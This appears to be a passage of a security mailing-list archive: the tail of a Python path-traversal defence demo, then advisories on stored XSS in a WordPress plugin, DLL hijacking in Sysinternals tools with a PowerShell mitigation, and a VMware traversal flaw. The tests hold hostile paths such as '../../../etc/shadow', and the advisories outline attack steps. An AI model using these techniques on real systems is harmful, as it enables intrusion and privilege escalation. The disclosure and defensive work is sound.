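    """Download side (#2): only files that resolve inside base_dir are read."""
    with open(resolve_inside(base_dir, requested_name), "rb") as fh:
        return fh.read()


def store_upload(base_dir, requested_name, data):
    """Upload side (#1): inside base_dir, and only allowlisted extensions."""
    target = resolve_inside(base_dir, requested_name)
    if os.path.splitext(target)[1].lower() not in ALLOWED_UPLOAD_EXT:
        raise PermissionError(f"upload type not allowed: {requested_name!r}")
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def _blocked(fn, *args):
    """True when fn(*args) is refused with PermissionError."""
    try:
        fn(*args)
    except PermissionError:
        return True
    return False


def run_demo():
    """Constructed tree: <root>/share is the served directory, <root>/secret.txt is not."""
    with tempfile.TemporaryDirectory() as root:
        share = os.path.join(root, "share")
        os.makedirs(share)
        with open(os.path.join(share, "readme.txt"), "w") as fh:
            fh.write("hello")
        with open(os.path.join(root, "secret.txt"), "w") as fh:
            fh.write("not served")
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(share, "link.txt"))
        return {
            "inside": fetch_file(share, "readme.txt"),
            "dotdot_blocked": _blocked(fetch_file, share, "../secret.txt"),
            "deep_dotdot_blocked": _blocked(fetch_file, share, "../../../etc/shadow"),
            "absolute_blocked": _blocked(fetch_file, share, "/etc/shadow"),
            "symlink_blocked": _blocked(fetch_file, share, "link.txt"),
            "upload_escape_blocked": _blocked(store_upload, share, "../jsp/Login.jsp", b"x"),
            "upload_ext_blocked": _blocked(store_upload, share, "WebStart1.jsp", b"x"),
            "upload_ok": os.path.basename(store_upload(share, "notes.txt", b"ok")),
        }
```

Comparing resolved paths with `commonpath` rather than a string prefix matters: a prefix test would accept `<root>/share-private/...` as being under `<root>/share`. The symlink case is the one a "just strip `..`" fix misses.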

[FD] Stored XSS in Advanced Custom Fields: Table Field allows authenticated users to do almost anything an admin user can (WordPress plugin)

2016-08-12 Thread dxw Security
Details

Software: Advanced Custom Fields: Table Field
Version: 1.1.12
Homepage: https://wordpress.org/plugins/advanced-custom-fields-table-field/
Advisory report: 
https://security.dxw.com/advisories/xss-in-advanced-custom-fields-table-field-could-allow-authenticated-users-to-do-almost-anything-an-admin-user-can/
CVE: Awaiting assignment
CVSS: 4.9 (Medium; AV:N/AC:M/Au:S/C:P/I:P/A:N)

Description

Stored XSS in Advanced Custom Fields: Table Field allows authenticated users to 
do almost anything an admin user can

Vulnerability

This plugin allows users (who have permission to edit posts) to inject 
JavaScript into pages within /wp-admin/. This means a user can exceed their 
privileges by creating a script that causes an admin’s browser to perform an 
action, such as creating a new admin user, deleting all posts, etc.

Proof of concept


Add a new ACF field group
Add a new table-type field to that field group
Create a new post/page, wherever the field group is set to display
Enter “alert(1)” into a field and save the post
Visit the page again, and the injected JavaScript will be executed

Tested with ACF PRO v5. Not tested with v4.

Mitigations

Update to version 1.1.13 or later.

Disclosure policy

dxw believes in responsible disclosure. Your attention is drawn to our 
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on secur...@dxw.com to acknowledge this report if you 
received it via a third party (for example, plug...@wordpress.org) as they 
generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this 
report within 14 days.

Timeline


2016-07-13: Discovered
2016-07-13: Reported to vendor by email
2016-07-13: Requested CVE
2016-07-13: Vendor’s autoresponder said they were unavailable until 1st August
2016-08-01: Vendor reported they were working on a fix
2016-08-01: Vendor reported issue fixed in 1.1.13
2016-08-08: Advisory published



Discovered by dxw:

Tom Adams
Please visit security.dxw.com for more information.
  



[FD] DDanchev's Blog Going Private - Request Access

2016-08-12 Thread Ddanchev
Hi, everyone,


As of today, my blog - http://ddanchev.blogspot.com - is going private, and 
I decided to let everyone know how to request access to 
continue to maintain access to the blog.

[http://ddanchev.blogspot.com/2016/08/ddanchevs-blog-going-private-request.html](http://ddanchev.blogspot.de/2016/08/ddanchevs-blog-going-private-request.html)

Looking forward to receiving your response.

Let me know.

Thanks,
Dancho



[FD] Defense in depth -- the Microsoft way (part 42): Sysinternals utilities load and execute rogue DLLs from %TEMP%

2016-08-12 Thread Stefan Kanthak
Hi @ll,

several of Microsoft's Sysinternals utilities extract executables
to %TEMP% and run them from there; the extracted executables are
vulnerable to DLL hijacking, allowing arbitrary code execution in
every user account and escalation of privilege in "protected
administrator" accounts [*].

* CoreInfo.exe:
  extracts on x64 an embedded CoreInfo64.exe to %TEMP% which loads
    %TEMP%\VERSION.DLL (on Windows Vista and newer)
  and executes it with the caller's credentials.

* Disk2VHD.exe:
  extracts on Windows 2003 and newer, both x86 and x64, an embedded
  Disk2VHD-tmp.exe to %TEMP% which loads
    %TEMP%\UXTHEME.DLL
    %TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes it with administrative privileges on Windows Vista
  and newer, and with the caller's credentials on Windows 2003.

* DiskView.exe:
  extracts on x64 an embedded DiskView64.exe to %TEMP% which loads
    %TEMP%\UXTHEME.DLL
  and executes it with administrative privileges on Windows Vista
  and newer, and with the caller's credentials on Windows 2003 and
  Windows XP.

* ProcMon.exe:
  extracts on x64 an embedded ProcMon64.exe to %TEMP% which loads
    %TEMP%\UXTHEME.DLL,
    %TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes it with the caller's credentials.

* RAMMap.exe:
  extracts on x64 an embedded RAMMap64.exe to %TEMP% which loads
    %TEMP%\SETUPAPI.DLL (on Windows 2003),
    %TEMP%\UXTHEME.DLL,
    %TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes them with administrative privileges on Windows Vista
  and newer, and with the caller's credentials on Windows 2003.

* VMMap.exe:
  extracts on x64 an embedded VMMap64.exe to %TEMP% which loads
    %TEMP%\CLBCATQ.DLL (on Windows 2003),
    %TEMP%\SETUPAPI.DLL (on Windows 2003),
    %TEMP%\UXTHEME.DLL,
    %TEMP%\VERSION.DLL (on Windows Vista and newer),
  and executes them with the caller's credentials.

* ZoomIt.exe:
  extracts on x64 an embedded ZoomIt64.exe to %TEMP% which loads
    %TEMP%\SETUPAPI.DLL (on Windows 2003),
    %TEMP%\UXTHEME.DLL,
    %TEMP%\VERSION.DLL (on Windows Vista and newer)
  and executes them with the caller's credentials.


See ,
,
,
 and
 for these
WELL-KNOWN and WELL-DOCUMENTED vulnerabilities^Wbeginner's
errors!


Mitigations:


* Don't use these vulnerable utilities (or other crapware
  which runs executables from unsafe directories like %TEMP%)!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
   to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".


stay tuned
Stefan Kanthak

[*] according to Microsoft's own SIR reports, more than half of
the Windows installations which send telemetry data have only
one active user account, i.e. some hundred million Windows
installations are susceptible to this design bug!


Timeline:
~~~~~~~~~

2015-11-02    vulnerability report sent to author and vendor

              NO REPLY from author

2015-11-17    vendor replies, opens MSRC case 31724

2016-01-29    vendor replies, closes MSRC case 31724: WONTFIX

2016-08-11    report published

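The second mitigation in the post above, as an added PowerShell example that is not part of Stefan Kanthak's message: it applies the ACE "(D;OIIO;WP;;;WD)" to %TEMP% through the .NET ACL classes and checks whether the entry is already present. The function names are mine; the SDDL decoding follows the post (deny, inheritable to files only, FILE_EXECUTE, Everyone).

```powershell
# Added example, not part of the original post: apply the ACE
# "(D;OIIO;WP;;;WD)" to %TEMP% and verify it. Function names are mine.
# SDDL decoded: D = deny, OI|IO = inherit to child files only (the
# directory itself stays traversable), WP = FILE_EXECUTE, WD = Everyone.

$Everyone = [System.Security.Principal.SecurityIdentifier]'S-1-1-0'   # WD

function Test-TempExecDenied {
    # $true when a Deny / Everyone / ExecuteFile ACE is already in the DACL.
    param([string]$Path = $env:TEMP)
    $acl   = Get-Acl -LiteralPath $Path
    $rules = $acl.GetAccessRules($true, $true,
                 [System.Security.Principal.SecurityIdentifier])
    foreach ($ace in $rules) {
        if ($ace.AccessControlType -eq 'Deny' -and
            $ace.IdentityReference.Value -eq $Everyone.Value -and
            $ace.FileSystemRights.HasFlag(
                [System.Security.AccessControl.FileSystemRights]::ExecuteFile)) {
            return $true
        }
    }
    return $false
}

function Add-TempExecDeny {
    param([string]$Path = $env:TEMP)
    if (Test-TempExecDenied -Path $Path) { return }
    $acl  = Get-Acl -LiteralPath $Path
    # Build the rule as an object instead of splicing the SDDL string:
    # .NET keeps the DACL canonical (deny ACEs ordered before allow ACEs).
    $rule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule `
        -ArgumentList $Everyone, 'ExecuteFile', 'ObjectInherit', 'InheritOnly', 'Deny'
    $acl.AddAccessRule($rule)
    Set-Acl -LiteralPath $Path -AclObject $acl
}

Add-TempExecDeny
# Print the resulting DACL; the new entry renders as (D;OIIO;WP;;;WD).
(Get-Acl -LiteralPath $env:TEMP).GetSecurityDescriptorSddlForm('Access')

# Equivalent cmd.exe one-liner:  icacls "%TEMP%" /deny *S-1-1-0:(OI)(IO)(X)
```

The deny ACE also stops legitimate installers that unpack and run from %TEMP%, so test it on a representative machine before deploying it by policy.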


[FD] NEW VMSA-2016-0011 - vRealize Log Insight update addresses directory traversal vulnerability.

2016-08-12 Thread VMware Security Response Center
   VMware Security Advisory

Advisory ID: VMSA-2016-0011
Severity:    Moderate
Synopsis:    vRealize Log Insight update addresses directory traversal
             vulnerability.
Issue date:  2016-08-11
Updated on:  2016-08-11 (Initial Advisory)
CVE number:  CVE-2016-5332

1. Summary

   vRealize Log Insight update addresses directory traversal vulnerability.

2. Relevant Products

   vRealize Log Insight

3. Directory traversal vulnerability in vRealize Log Insight

   vRealize Log Insight contains a vulnerability that may allow for a directory
   traversal attack. Exploitation of this issue may lead to a partial information
   disclosure. There are no known workarounds for this issue.

   VMware would like to thank Peter Nelson, Security Engineer at WakeMed Health
   & Hospitals for reporting this issue to us.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
   the identifier CVE-2016-5332 to this issue.

   Column 5 of the following table lists the action required to remediate the
   vulnerability in each release, if a solution is available.

   VMware                Product  Running            Replace with/
   Product               Version  on       Severity  Apply Patch    Workaround
   ====================  =======  =======  ========  =============  ==========
   vRealize Log Insight  3.x      VA       Moderate  3.6.0          None
   vRealize Log Insight  2.x      VA       Moderate  3.6.0          None

4. Solution

   Please review the patch/release notes for your product and version and verify
   the checksum of your downloaded file.

   vRealize Log Insight 3.6.0
   Downloads and Documentation:
   https://my.vmware.com/web/vmware/details?downloadGroup=VRLI-360=598=12336

5. References

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5332

6. Change log

   2016-08-11 VMSA-2016-0011 Initial security advisory in conjunction with the
   release of vRealize Log Insight 3.6.0 on 2016-08-11.

7. Contact

   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

   This Security Advisory is posted to the following lists:

security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org

   E-mail: security at vmware.com
   PGP key at: https://kb.vmware.com/kb/1055

   VMware Security Advisories
   http://www.vmware.com/security/advisories

   VMware Security Response Policy
   https://www.vmware.com/support/policies/security_response.html

   VMware Lifecycle Support Phases
   https://www.vmware.com/support/policies/lifecycle.html

   Twitter
   https://twitter.com/VMwareSRC

   Copyright 2016 VMware Inc.  All rights reserved.

